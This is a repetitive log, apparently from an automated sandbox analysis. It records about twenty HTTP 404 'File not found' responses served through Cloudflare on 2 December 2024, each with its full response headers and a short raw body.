Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEX50%2B1GB7zdkSizpFC8SgVd4FYNBu2dmRJ%2BgE1x%2BIx4gWTqSkq8d%2FOU2izgWS0DFByXxGqPOeQcB3o7pFxw0%2BWvtcgusK47Oe8dOmEAo3%2F3sbq2wJB9IgyypJ385VBj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc3c15909ef9d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1838&min_rtt=1838&rtt_var=919&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=97&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JDLhj9ltAbdSkCyaYajXwU63DUUGWGdVaYvdJjk8%2BmQXaaJnTzp83oac1niVtKY13qa6LsGlekGyafhwaPRdDiZB%2FrnDmleX1oTTzVhU8SqsGBxPYtjgpnbrvzkHVVFW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc3cb9ae14401-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1770&min_rtt=1770&rtt_var=885&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0bJBu3t00vSHa6yqPTeXNS3kJoEkndnqN1I1DvB1Pc1HpxBaYPP%2FMRNNv60T7URuEF9vixl6j8Yu9gd2uz9%2BEGwG%2Byg0XVmych1xcX4VIWzfQskfKxQFwu4tkCLp9Wlp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc3d63c6d439d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1793&rtt_var=896&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i5VqL3UN%2Fpkb571Aqx0sVVT3T2mwwz17aAefxVQ%2Bld3q0cDS7wz97eR%2B5vJkemYTQ8rfJzwBrLdFYh9zYUlGp867nvu9CFXGyjmftEVjlaoTKwPw9l8neG7KgJPcrrk8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc3e11b1c42d3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2357&min_rtt=2357&rtt_var=1178&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=liVCNVQMbv7jEVNXVPbUxVYQGOedYjTLISy2p317m6ATogRRx8%2Fn2tJrQsYttj3A6tOtytNRM9QaorUSdFO54rFr%2Ft%2BsnQResQdmA%2BxpgdS5kPMZZZZ%2FvDvvZcIDITWx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc3eb89c042a3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1549&rtt_var=774&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IehVdfUsnYpIgbAY4eZDdKetol9Z6xeE50kC1ERYV6%2BLuz0T8bcVh7QjRfTEX%2BD86520VatcGm8nON6HCyAXlYLrAf4%2FO2Sy%2Flx062xLiFwGEXP%2Bo%2FE82nmg4cQM9K%2Bt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc3f63bb642e7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UQ7r9%2Br%2F4Yt3vfk1yXsRlChkYA7xyHnkOHa43ZDf7mfryfv%2F1CnnEatujjMCNqvCY0Qf3xaIh4pn6hqRTtA%2Fxz0IM2WYd5%2F1d6dGYSHivH97lqAhfqSNh2gwRuaOM9GE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc401188442ef-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1540&min_rtt=1540&rtt_var=770&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8L3K47K5oBma%2Fx5cQXKCK7dL%2F9MNGY3hAz7JigJjXIWswR1F%2F11ikVOdNfFFVOtmj9HRWOziKf7KSeIysXONjBlTwXW3nkXPuNtE86%2FE8kmSzEW6fNImMep4g4cEueER"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc40bbfab8c3f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2105&min_rtt=2105&rtt_var=1052&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5WuD2aW%2BOX6xDb8tjkVwkOTxtLmfqdWTDlaX3QRCQjqUalFO%2FOvHLIPm1oF9XR6277TLBc%2FwEIf%2F4kzYM%2FbaOegzBi3j2wvWnnOqqgb3qMbwCkvUWVlby%2BbWkaZwUvKg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc4163aa5f3bb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1656&rtt_var=828&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UmO7WCcnKDrzFvqYoCdCx3LRFdtk2%2FGxBiPwsQZEMF%2FJcuNk5Os5lc7zrHASSbu5rYCEZVtpyvJyAVKsc9cdUhzBwjsipiXSJb8R4bk%2BwNpsST1B2ZR5f6%2FbTMTCB7nm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc420fb577cf9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1797&rtt_var=898&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:46:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PC5TI%2FDOs%2FnXagzrQIRvE%2FHQckFKXQUVFsTT5z1i7EIzL8BRLLsMgvjXxX%2B%2FBu9YgtMRc9P07Ad5b6mT%2BwdU%2B3mw%2BEicpnQrLQFgSe5Wr6pgI489QWymYYc8IbG4vLKv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc42b7b1542f5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2657&min_rtt=2657&rtt_var=1328&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uI6H1fFlx0W2Jp5W4ac3%2FK0vkhj%2BG6K310XdmWLfe6T5tDc6fobrWBKM2T3RiZISdhWaYbE6d8mMRIqOvGrqhFJFbRAIAHLDgA19rJlXqs8TDhdhwo7Ccx9Oxc73KttZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc4356fea8c78-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2047&min_rtt=2047&rtt_var=1023&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kXgp45Bte48SJdhSGycJmGA07VouddRG5ZcwAr8VsHHWkb4vaPRow8f%2BKGM5xiRlSx5vUBCV8W5Qv5I7gNMVldta3gS1IhlwJtLAzNU6CfdZb1JjWzE3LLbG3EVqcsZW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc4409cd54381-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1788&rtt_var=894&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6K%2FiaS2gopocapwHCwUBDSG1MHazdhJe4IMAOIf%2BNhD093bN0RqaCxlnbkhCP5AUCPT%2FQiwu3754KTZQ9eZdZmgZRB4f3IDHx8tZ3lG7MVGcvJzk%2BZLvlFcBGXL6HonV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc44b7c248c6f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=48129&min_rtt=48129&rtt_var=24064&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k1lDy7abSz1lcZu2NI3Q19vA3QjCmqQRvML0JaEknk6mjKvAnMf%2F0Bp8gysdzKUeFuGlMZqFAO9fHAzmi4f927k%2FmvPHKlyLQsdjmNePshGWzwXnH48sLqNbMIHr1GsN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc455a86aefa5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1798&rtt_var=899&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IDn8AqmjhFRKedibMK6Da5sg6meL%2BpNGm8kFm%2Fy8hQenW584IGiM1jU3fh3aWOUaP5sQ8zDRRU87tigYLEVPpxgNT3ahJV6Etw7VI2hrxuSzYfRo4NjM5rP%2BMEFyweli"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc45fc8a4c45e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1609&rtt_var=804&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Po3FJo4H%2BamYCO1zPk%2Fceyz%2FTcBG4hhBUCR9HIf%2B48zGVWDm8ID4aosb23xk5hM4qZsN5ina%2BfNa%2Bwkfin4SjrP3wyVO1%2BZ1o4nmd8oHkj%2F5%2F%2BdiZl%2FdsxrLjIddGIQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc46a48858c59-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2021&rtt_var=1010&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6aiWeyrF8%2B10SbTMO1Zk46WhOnEUbLfstHtp3wrUx%2ByuRl0GOXKNx1DIBaFQfDOnYY3CSTw8raT4WYqwdlOWWogweIMagRcLD9pTEAFtcRGf8omOSj8R0fOnadN4Xapr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc4748e4c0f46-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1631&rtt_var=815&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UpGSsB93pjOCGtgbeUoVpqRLbpMi%2FfCIGUkZeM4fgPU0G05OACiBDnW4Sg4vr38%2BdG65YZ37MXyRlSQDSccUTcunPcWgj6SwcLQYCvi2leyguOkH%2FYtcydXBb98Yq4vC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc47ecdef0f45-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1701&rtt_var=850&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7P7wxeMajzcIsoGuBizVvWycEJ5t1Z0nYYNUpTDpGsJJzVqoFPZmEuJS2QGiFR9CrLflw6ql6nPkkRtGF48%2F910RQD81%2FXIwjd8ZI66i6qDnOHKqhFFt34IGrwrhR16K"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc488ee1342b5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1616&rtt_var=808&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RFWndACbUNqzGWFBorhvCR0AAjO0hV1PsSoil5ktM2%2FkKQauHe12bAo4cxaD4uipU1SVdjDU1z%2BzT3%2BV1Nz3Zxdyw1z3d%2F3L9Y11YhHlTN1ifjO%2BAFQf3XnDQxs%2B2sN%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc4934c003342-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1845&min_rtt=1845&rtt_var=922&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vlJRCWpovmHBCqRG0%2FbRW84GiWofS%2BFTYSVe%2BbTnN8y1zpOfNaAkrCElKx1jAkLZp%2B%2F18isbiiQE9JHCqL4%2Bm46nxr12CCC5MQmoKNvWVKCe1MRRQWgX5WUD24JcH7yg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc49d6cd47286-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=904&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LIgKPzx02aGMJ7BmfoqN3%2BWsr%2BS%2FD6ndiGPHGRuwuIFHdFn0FfmmWyODJzJVGKj%2BMF%2B6rFLll7v9zQXYzxDPUBGXgpVb%2BS0WZM9MskUgqzQOxdK06A3SSGH7LYggYJkM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc4a79a42f5f7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1738&rtt_var=869&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V6F8VG76NOE84Ip%2B%2BGutLaQbTcrAMNlnfb2q7oL4v4Tak8x0gyoGOVv79gWC3a0k71aDFccXwi4prh0kdKuEJ%2FraO9cweIX4jzUqf6sfCmKDIWVhSRk1ysKxvBwc3pSL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc4b17d7d42e0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1671&rtt_var=835&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:47:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJ70farsOW3uj3ES386EEqY172lsfCsZt9UB1AnST16IsWkWP5nu8hUIh%2FWE5qaT%2FZH%2BYgyZBQlecIHi%2FWuBkA%2B%2FyJNCi3%2FZnTwGWjCQAAFMitoFrCqafBRxCyQXRTe9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ebbc4bc48c732ee-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=2069&rtt_var=1034&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=407&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
